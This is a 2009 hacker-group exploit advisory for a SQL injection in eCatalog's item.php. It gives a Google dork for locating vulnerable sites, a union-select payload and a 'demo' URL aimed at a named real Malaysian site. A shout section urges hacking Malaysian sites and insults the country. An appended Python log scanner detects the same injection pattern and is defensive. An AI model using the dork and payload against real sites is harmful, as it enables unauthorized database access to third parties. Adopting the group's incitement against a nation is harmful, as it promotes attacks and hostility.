
Author: Don Tukulesto & Cyb3r_tr0n | eCatalog Software SQL injection Vulnerability | Views: 9201

root@indonesiancoder.com
http://www.indonesiancoder.com

#############################################################
## eCatalog Software - item.php?id ##
## Author : Don Tukulesto (tukulesto[at]hackermail[dot]com)##
## Cyb3r_tr0n ( cyb3r_tr0n[at]hackermail[dot]com )##
## Homepage : http://www.indonesiancoder.com ##
## Date : Sunday, August 30, 2009 ##
#############################################################

[ Software Information ]

[+] Software : eCatalog
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:item.php?id "eCatalog"

#############################################################

[ POC ]

http://127.0.0.1/item.php?id=[ID]+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--

[ID] = Valid ID

[ Demo ]

http://www.ibcom.com.my/catalog/item.php?id=-493+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--

#############################################################

[ Greetings ]

[+] All of Indonesian Coder Member, mistersaint, gonzhack, m364tr0n, m3nw5, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, bejat Bejat, Plaque, rey_cute, Tuex, XNITRO, DraCoola
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu, eminem
[+] Kill-9 crew, kaMtiEz, arianom

[ SHOUT ]

Not fasting, but starving >.<" (M3NW5 STYLE :p)
STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!

Related posts: none | Posted: 2009/09/15 8:35 from 125.161.199.92
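A defender-side check for the request pattern shown in the PoC, added here as an example and not part of the original advisory: it scans web access log lines for `item.php` requests whose `id` parameter is not a plain integer. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Keywords from the advisory's PoC; used only to label a hit, not to decide it.
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|--|\bversion\s*\(", re.I | re.S)

def classify_id(value):
    """Return 'ok', 'sqli' or 'malformed' for one URL-decoded id value."""
    # Allow-list: the advisory says a legitimate id is a valid item number.
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    return "sqli" if SQLI_RE.search(value) else "malformed"

def scan(lines, script="item.php", param="id"):
    """Yield (line_number, verdict, decoded_value) for suspicious requests."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs decodes %xx and turns '+' into a space, as the server does.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            verdict = classify_id(value)
            if verdict != "ok":
                yield n, verdict, value

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Sep/2009:08:35:01 +0000] "GET /catalog/item.php?id=493 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [15/Sep/2009:08:35:09 +0000] "GET /catalog/item.php?id=-493+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15-- HTTP/1.1" 200 4811',
    '192.0.2.77 - - [15/Sep/2009:08:35:12 +0000] "GET /catalog/item.php?id=493%27 HTTP/1.1" 500 312',
    '192.0.2.10 - - [15/Sep/2009:08:35:20 +0000] "GET /catalog/index.php?id=abc HTTP/1.1" 200 900',
    '192.0.2.77 - - [15/Sep/2009:08:35:30 +0000] "GET /catalog/item.php?id=-493%20UNION%20SELECT%201,2 HTTP/1.1" 200 4811',
]

if __name__ == "__main__":
    for n, verdict, value in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}: {value!r}")
```

The integer allow-list is what decides a hit; the same rule applied server-side (cast or validate `id` as an integer and bind it as a query parameter) removes the injection point.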
